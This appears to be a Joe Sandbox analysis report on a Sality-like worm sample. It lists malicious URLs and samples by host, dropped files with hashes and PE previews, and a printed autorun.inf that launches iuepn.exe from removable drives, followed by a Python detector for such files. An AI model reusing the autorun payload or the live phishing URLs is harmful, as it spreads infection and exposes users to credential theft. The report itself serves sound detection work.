LEASEWEB-NL-AMS-01 Netherlands (NL) | https://reservation.exnetehovervs.com/apart/285z92aaza77z | malicious | Unknown | 185.17.186.162
LEASEWEB-NL-AMS-01 Netherlands (NL) | http://cacahs.fdavm.com/ | malicious | Unknown | 178.162.175.77
LEASEWEB-NL-AMS-01 Netherlands (NL) | http://multichaindappsx.pages.dev/ | malicious | Unknown | 89.149.193.105
LEASEWEB-NL-AMS-01 Netherlands (NL) | http://booking.extnnehotteir.com/admin/o2shi1bka89 | malicious | Unknown | 185.17.186.161
LEASEWEB-NL-AMS-01 Netherlands (NL) | 8bwKawHg0Z.exe | malicious | FormBook | 79.170.242.64
LEASEWEB-NL-AMS-01 Netherlands (NL) | SOA 020724.exe | malicious | FormBook | 212.32.237.91
LEASEWEB-NL-AMS-01 Netherlands (NL) | https://supp-review9482.eu/ | malicious | Unknown | 185.17.186.162
LEASEWEB-NL-AMS-01 Netherlands (NL) | http://multichaindappsx.pages.dev/ | malicious | Unknown | 89.149.193.104
LEASEWEB-NL-AMS-01 Netherlands (NL) | Inquiry No PJO-4010574.exe | malicious | FormBook | 212.32.237.101
AMAZON-AES (US) | FFbd.dll | malicious | Unknown | 50.16.47.176
AMAZON-AES (US) | https://rb.gy/zsqpja | malicious | HTMLPhisher | 18.211.218.206
AMAZON-AES (US) | https://singingfiles.com/show.php?l=0&u=2156442&id=64574 | malicious | Unknown | 34.203.90.74
AMAZON-AES (US) | https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1 | malicious | Unknown | 34.201.239.212
AMAZON-AES (US) | http://multichaindappsx.pages.dev/ | malicious | Unknown | 52.72.219.252
AMAZON-AES (US) | https://swans-muffin-1id4964-7304421.netlify.app/form | malicious | Unknown | 54.205.31.52
AMAZON-AES (US) | http://diffusion-florentine-facilitated.netlify.app/form.html | malicious | Unknown | 18.213.222.111
AMAZON-AES (US) | https://reg1a-g4ad23-269fe50-lqng5s.netlify.app/dev.html/ | malicious | Unknown | 54.147.25.172
AMAZON-AES (US) | Scan405.exe | malicious | FormBook | 18.207.45.52
AMAZON-AES (US) | ScanPDF_102.exe | malicious | FormBook | 34.195.23.156
AEROTEK-AS (TR) | hesaphareketi-01.pdf.exe | malicious | AgentTesla | 94.199.200.98
AEROTEK-AS (TR) | 739077083533. FedEX_13100976 _20.05.2024 %100%_jpg.exe | malicious | AgentTesla | 94.199.206.42
AEROTEK-AS (TR) | 024 - PT MARGATEK_ SETYATAMA PO 13100976 _20.05.2024 %100%_jpg .exe | malicious | AgentTesla | 94.199.206.42
AEROTEK-AS (TR) | oae7jKW2lr.exe | malicious | AgentTesla | 109.232.216.54
AEROTEK-AS (TR) | #U0130#U015eLEM #U00d6ZET#U0130_20524057699-1034 nolu TICARI.exe | malicious | AgentTesla | 94.199.206.42
AEROTEK-AS (TR) | F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130.exe | malicious | AgentTesla, PureLog Stealer | 109.232.216.54
AEROTEK-AS (TR) | F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130.exe | malicious | AgentTesla | 109.232.216.54
AEROTEK-AS (TR) | F#U0130YAT TALEB#U0130.exe | malicious | AgentTesla | 109.232.216.54
AEROTEK-AS (TR) | Siparis. #PO000867000960 AZTEK Order _ BIRLESIM NEKS A.s 14.05.2024 .exe | malicious | AgentTesla, PureLog Stealer | 94.199.206.42
AEROTEK-AS (TR) | F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130.exe | malicious | AgentTesla, PureLog Stealer | 109.232.216.54
AMAZON-02 (US) | poMkNYHDU3.exe | malicious | Remcos | 104.192.141.1
AMAZON-02 (US) | NtjLYDrHzE.elf | malicious | Mirai, Gafgyt, Okiru | 15.229.32.8
AMAZON-02 (US) | PTT Group project - Quotation.exe | malicious | FormBook | 13.248.169.48
AMAZON-02 (US) | https://singingfiles.com/show.php?l=0&u=2156442&id=64574 | malicious | Unknown | 18.239.50.108
AMAZON-02 (US) | https://metamesklogni.webflow.io/ | malicious | Unknown | 52.222.232.144
AMAZON-02 (US) | https://rules-pear-kft5d2.mystrikingly.com/ | malicious | Unknown | 143.204.176.115
AMAZON-02 (US) | https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1 | malicious | Unknown | 13.227.219.3
AMAZON-02 (US) | http://review-page-violation-issue-meta-center.vercel.app/ | malicious | Unknown | 76.76.21.98
AMAZON-02 (US) | http://cacahs.fdavm.com/ | malicious | Unknown | 13.227.219.3
AMAZON-02 (US) | http://mysterymint-s10.vercel.app/ | malicious | Unknown | 76.76.21.98
HETZNER-AS (DE) | https://gmoq4wwvl9phy.pages.dev/smart89/ | malicious | Unknown | 195.201.57.90
HETZNER-AS (DE) | lem.exe | malicious | Vidar | 5.75.221.27
HETZNER-AS (DE) | 0001.exe | malicious | AgentTesla, PureLog Stealer | 176.9.105.210
HETZNER-AS (DE) | file.exe | malicious | Vidar | 49.13.159.121
HETZNER-AS (DE) | Scan405.exe | malicious | FormBook | 116.202.213.59
HETZNER-AS (DE) | ScanPDF_102.exe | malicious | FormBook | 116.202.213.59
HETZNER-AS (DE) | https://vi-822.pages.dev/robots.txt | malicious | HTMLPhisher | 5.161.38.67
HETZNER-AS (DE) | https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de | malicious | HTMLPhisher | 5.161.38.67
HETZNER-AS (DE) | https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de | malicious | HTMLPhisher | 5.161.38.67
HETZNER-AS (DE) | QeIcyVt0Op.exe | malicious | PureLog Stealer, Vidar, zgRAT | 5.75.221.27
          No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\rksowY.exe | log1.exe | malicious | Babadeda, Bdaejec, Neshta
C:\Users\user\AppData\Local\Temp\rksowY.exe | log2.exe | malicious | Babadeda, Bdaejec, Neshta
C:\Users\user\AppData\Local\Temp\rksowY.exe | 2.exe | malicious | Bdaejec
C:\Users\user\AppData\Local\Temp\rksowY.exe | gracNYJFpD.exe | malicious | Bdaejec, GhostRat, Nitol, Young Lotus
C:\Users\user\AppData\Local\Temp\rksowY.exe | xpKZwKFN9W.exe | malicious | Bdaejec
C:\Users\user\AppData\Local\Temp\rksowY.exe | LVF7FM9Z4I.exe | malicious | Bdaejec
C:\Users\user\AppData\Local\Temp\rksowY.exe | hJSrJRHret.exe | malicious | Bdaejec
C:\Users\user\AppData\Local\Temp\rksowY.exe | KFt0cactum.exe | malicious | Bdaejec
C:\Users\user\AppData\Local\Temp\rksowY.exe | gvQbT2QOfb.exe | malicious | Bdaejec
C:\Users\user\AppData\Local\Temp\rksowY.exe | HN3iYIEz7m.exe | malicious | Unknown
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):19456
                              Entropy (8bit):6.590971855603511
                              Encrypted:false
                              SSDEEP:384:1FoShXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:5/QGPL4vzZq2o9W7GsxBbPr
                              MD5:938AB2A2B5014611C3EBCFA145576C11
                              SHA1:477CBD607878830739B8324D316675F96F2058EE
                              SHA-256:A72035D201F27AFFFDD94A53F9DFA5DAB7277F68A3899F9E01376D98DE3339CF
                              SHA-512:342EAEF8F86C193986E1878FD013668D5F2A4AF10B10A76330C20ACAC8E2250A724D59E5A8C3F0DAF10DD8DFDD5E3A1DE68820E971BFC71415F48230014181D7
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:modified
                              Size (bytes):2389504
                              Entropy (8bit):6.731345632215611
                              Encrypted:false
                              SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                              MD5:D31456E4E63070C4F5B1B590E26473B3
                              SHA1:9AA4CB8BC265DF73A8F8F715076D15E2A6E24640
                              SHA-256:FD4DC424A62FD3AAD956F4EF31556F95E2CB8B63D9B4D4CA7BE171583D672CE8
                              SHA-512:5B7BBA511C63E5CB53FC50E5D7652C38D769823C23B9E6A6F65208455E0D86EFD9F619753F8C3E442B8BAF231A932C319080BC1F316D6A9CDCFC2DC7D61AD044
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):31744
                              Entropy (8bit):6.36644778242075
                              Encrypted:false
                              SSDEEP:768:uWQ3655Kv1X/qY1MSdfsQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdfvGCq2iW7z
                              MD5:5DD0482C1A3CE1C8C24FB3AA66B96D19
                              SHA1:F3F7D95A7EF8E1B186D44D2619CDEEB21B269AC3
                              SHA-256:50854CA5A15B4F68E30E17D1FEB7471022E017B126239F69A60A7C1FD4200FE9
                              SHA-512:2BC8616EB5F9A475968659E3B80FD9C8FB5F2D40EFD89CE919BF60A7ECF0967BA2B0BA5742BA01516D0A1794D6C628E37888FB24E5DA1BB49E58078EB7C84EE2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):4
                              Entropy (8bit):1.5
                              Encrypted:false
                              SSDEEP:3:Nv:9
                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:foo.
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):4
                              Entropy (8bit):1.5
                              Encrypted:false
                              SSDEEP:3:Nv:9
                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:foo.
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):258
                              Entropy (8bit):7.284780829056715
                              Encrypted:false
                              SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                              MD5:88D20B23F81FA97A852263FC732277F8
                              SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                              SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                              SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                              Malicious:false
                              Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):15872
                              Entropy (8bit):7.031113762428177
                              Encrypted:false
                              SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                              MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                              SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                              SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                              SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 100%
Joe Sandbox View:
• Filename: log1.exe, Detection: malicious
• Filename: log2.exe, Detection: malicious
• Filename: 2.exe, Detection: malicious
• Filename: gracNYJFpD.exe, Detection: malicious
• Filename: xpKZwKFN9W.exe, Detection: malicious
• Filename: LVF7FM9Z4I.exe, Detection: malicious
• Filename: hJSrJRHret.exe, Detection: malicious
• Filename: KFt0cactum.exe, Detection: malicious
• Filename: gvQbT2QOfb.exe, Detection: malicious
• Filename: HN3iYIEz7m.exe, Detection: malicious
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:data
                              Category:modified
                              Size (bytes):258
                              Entropy (8bit):7.284780829056715
                              Encrypted:false
                              SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                              MD5:88D20B23F81FA97A852263FC732277F8
                              SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                              SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                              SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                              Malicious:false
                              Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):70656
                              Entropy (8bit):7.97694558158495
                              Encrypted:false
                              SSDEEP:1536:P0NKFeK+ew6OwZSO0Yj6y2CLGWixM0UF8P44v:P06eKy6XX6dKwQFF4v
                              MD5:088362DAABB86D586B5B6BBFBACC2626
                              SHA1:1D1505A3454FFFAE2308D5D36A58C50C8628C820
                              SHA-256:B73B0BA5269326E9E11B6D947147E589E39DAD397646E5D69B10FBDD0BB25A21
                              SHA-512:41617CC4013A61A5E1A4C5370D37C1AD5CA0398AC73F28A11333F5E7B7D38570E6E5DBA6CC8C479B02DB1FFEDAA416896B1D8FB6A4D92088BE019D0556ED2BDB
                              Malicious:true
                              Yara Hits:
                              • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................0..............................................`...<....................................................................................................................text.... ........................I. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............].....U.....@.j.....@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):340
                              Entropy (8bit):7.428989227311812
                              Encrypted:false
                              SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                              MD5:2516CA1835F985ADEAB21CFBC34FF724
                              SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                              SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                              SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                              Malicious:false
                              Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                              Category:dropped
                              Size (bytes):23040
                              Entropy (8bit):7.587194257344362
                              Encrypted:false
                              SSDEEP:384:CO90QQ/D91ZSH+chn7N6VDLvqEot7czwGQZbxEu47VP5bBSg5pxeKg:C1QM5Czz6VaEY7czwouehlfjQKg
                              MD5:4C9345B4819695C678D2CE9688D95FFB
                              SHA1:805FB11F46E71CD5AE00D489F3EB7385BD55DF63
                              SHA-256:6522C2A699B499B0E84E13D6D3A88D0C78A4EA59AF2B0FD3F0FBC22644A73751
                              SHA-512:6C115342CCFE01FE529AC8C4F448531FD6912B55E941C36A943C7BAE484230BEDA11EE5DEEEA816E263BF1D54E989B9CFC0D90AE24E2D77B887E6AF4DE36F82D
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 26%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!mw.!mw.!mw.Zq{. mw.qy.#mw.Nrs.#mw..r}.#mw..K}..mw..b*.(mw.!mv..mw..K|.?mw.!mw. mw..r|."mw..rs. mw.Rich!mw.........PE..L...Z.._...........!.....P...V......0...................................................................................`...................................4.......................................................................................UPX0....................................UPX1.....P.......P..................@...UPX2.................T..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.465915215773589
                              Encrypted:false
                              SSDEEP:6144:5zZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:RZHtBZWOKnMM6bFpZj4
                              MD5:267F6B2978C6A77827851E0C037C5FAB
                              SHA1:6F372593BEF8AF26027C49AB6195FF0D64CCE63E
                              SHA-256:B1B30BD360830CD4861B8EC080CF0E143D14209EBF65D759A90D18D5DD5E8552
                              SHA-512:3BA36CA7F42DB12ECC6407A561F64762FF8EDE07011A1EBFC69F141500AD0B037715BF8B8BF75E08B6A6A0D47430FB24EC6F45A3060A0C8ABF751AE0E96FF6BB
                              Malicious:false
                              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.%.................................................................................................................................................................................................................................................................................................................................................q..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:Windows SYSTEM.INI
                              Category:dropped
                              Size (bytes):255
                              Entropy (8bit):5.255504738471726
                              Encrypted:false
                              SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtPRQeR:F4Yv7yk3OUBq82wqFtPWW
                              MD5:1AEF09244F6A38EC6222A186332FF6A2
                              SHA1:91094ED5279233127C44756FC22C2DDBE6CE9270
                              SHA-256:DF79D44B019053257F4BD44CF08BA5095261135D4B997B0882FDAEEC08B0C9B4
                              SHA-512:CF0B497BC417F82F1671715364BD74031C7A5527B638C7AC6EC9CEA8E57BF66F8D5B5F4C54BDF8252675E6DA9435A11D9DE723282038DE260AE621CAC41EFDAB
                              Malicious:false
                              Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=45869063649..
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:Microsoft Windows Autorun file
                              Category:dropped
                              Size (bytes):252
                              Entropy (8bit):5.31479145452486
                              Encrypted:false
                              SSDEEP:6:0CUm1c5ZLJoSp5oroQ6WrTYTorRkUR48wLJoB1gwxOIV19ov:0CUmiJoa2row3corR/4nJoB+wNJov
                              MD5:E24E2126EA4D3223837AD40236EABF49
                              SHA1:B979A9BAB0132F550C0EB99C3D9FBF4A6BB4CF30
                              SHA-256:94BBA17485A0410DD12AFD1236F5203F769B8BB6B994F671167CA124644BAF10
                              SHA-512:31FAA2C94703D93240D66765E9352DBCCE71003E273399856B4CDB1972757545D6623715493316EF9D0204210C6930A6CE5D41E999F012FDCEFDABCFA1C53C79
                              Malicious:true
                              Preview:[AutoRun]....;pWCD kmpmtt..;cgmvuK jgrmbT..shelL\oPen\comMaND = iuepn.exe....;XNaRLsqGtqPj..open=iuepn.exe..shell\oPeN\DEfaUlT=1....;dtYoDftaw AxMphwqLevr pqTdobtSnUgE..shEll\Explore\COMMaNd = iuepn.exe..;gdxgetvidL..SHell\AUtoplay\commANd =iuepn.exe..
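The dropped autorun.inf above is the usual USB-spreading shape: the launch verbs (open, shell\open\command, shell\explore\command, shell\autoplay\command) all point at iuepn.exe in the volume root, the key names are written in random case and junk ";" comment lines are interleaved to break naive string signatures. Windows parses the file case-insensitively and ignores the comments, so a detector has to do the same. The following is an added example, not part of the Joe Sandbox report and not the sample's own code; it rebuilds the dropped file from the preview (".." restored to CRLF), parses it the way the shell does and flags the two things that matter: randomized casing of the same key component and launch verbs that point at an executable. The benign control file is constructed for comparison.

```python
import re

# Constructed sample: the autorun.inf dropped by 1.0.0.2.exe as shown in the
# report's preview, with the ".." separators restored to CRLF line endings.
SAMPLE_AUTORUN_INF = (
    "[AutoRun]\r\n"
    "\r\n"
    ";pWCD kmpmtt\r\n"
    ";cgmvuK jgrmbT\r\n"
    "shelL\\oPen\\comMaND = iuepn.exe\r\n"
    "\r\n"
    ";XNaRLsqGtqPj\r\n"
    "open=iuepn.exe\r\n"
    "shell\\oPeN\\DEfaUlT=1\r\n"
    "\r\n"
    ";dtYoDftaw AxMphwqLevr pqTdobtSnUgE\r\n"
    "shEll\\Explore\\COMMaNd = iuepn.exe\r\n"
    ";gdxgetvidL\r\n"
    "SHell\\AUtoplay\\commANd =iuepn.exe\r\n"
)

# Constructed benign control: an autorun.inf that only sets an icon and label.
BENIGN_AUTORUN_INF = "[AutoRun]\r\nicon=setup.exe,0\r\nlabel=Installer\r\n"

# Keys whose value the shell runs (or offers as the default verb) when the
# volume is opened; matched on the lowercased, trimmed key name.
LAUNCH_KEYS = {"open", "shellexecute", "shell\\open\\command",
               "shell\\explore\\command", "shell\\autoplay\\command"}
EXECUTABLE_SUFFIXES = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js")


def parse_autorun(text):
    """Parse autorun.inf like the shell does: case-insensitive section and key
    names, ';' comment lines ignored, whitespace around '=' stripped.
    Returns {section: {key: value}} with section and key names lowercased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_targets(text):
    """{normalized key: target} for every key that would run something."""
    autorun = parse_autorun(text).get("autorun", {})
    return {k: v for k, v in autorun.items() if k in LAUNCH_KEYS}


def randomized_casing(text):
    """True when the same key component (e.g. 'shell', 'open') appears with
    more than one spelling, which is what a polymorphic generator produces."""
    spellings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";[" or "=" not in line:
            continue
        for part in line.split("=", 1)[0].strip().split("\\"):
            spellings.setdefault(part.lower(), set()).add(part)
    return any(len(seen) > 1 for seen in spellings.values())


def assess(text):
    """Reasons this autorun.inf looks malicious (empty list if none)."""
    reasons = []
    if randomized_casing(text):
        reasons.append("randomized key casing")
    for key, target in sorted(launch_targets(text).items()):
        if target.lower().endswith(EXECUTABLE_SUFFIXES):
            reasons.append(f"{key} -> {target}")
    return reasons


if __name__ == "__main__":
    for label, inf in (("dropped", SAMPLE_AUTORUN_INF), ("benign", BENIGN_AUTORUN_INF)):
        print(label, assess(inf) or "no findings")
```

The parser normalizes before matching, so a signature built on the normalized keys (four launch verbs pointing at one root-level .exe) survives any re-casing the worm applies on its next infection.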
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):103140
                              Entropy (8bit):7.980117026319258
                              Encrypted:false
                              SSDEEP:1536:P0NKFeK+ew6OwZSO0Yj6y2CLGWixM0UF8P44VO18jdt9Y7DXyAJE:P06eKy6XX6dKwQFF4guj/cDE
                              MD5:02EE8DD5E84DD2C1F5DC93A85A943DCB
                              SHA1:DE63DE2E0E72C6D8B762C121D430D903A43C2EDB
                              SHA-256:0B5DBFDCB1D2B2A9219DBB47881316ADCBD484471974577D7C7B73F7D5967CCA
                              SHA-512:FCB182C13D4C0F5955AC49740BFD5DFE72DB4FF7A4F384581ACFB1FE6AEF5998DF3E4780363591BC1DF4C74F1FC5025B7FBD41322BC5DE3EDAA0F8C5579BF428
                              Malicious:true
                              Yara Hits:
                              • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\iuepn.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................0..............................................`...<....................................................................................................................text.... ........................I. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............].....U.....@.j.....@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Entropy (8bit):7.851453430435399
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.24%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                              • UPX compressed Win32 Executable (30571/9) 0.30%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              File name:1.0.0.2.exe
                              File size:5'242'880 bytes
                              MD5:ad809738e208d99a28009023546bc695
                              SHA1:3326e4971b5b23122dac680dfb9eb41df0692267
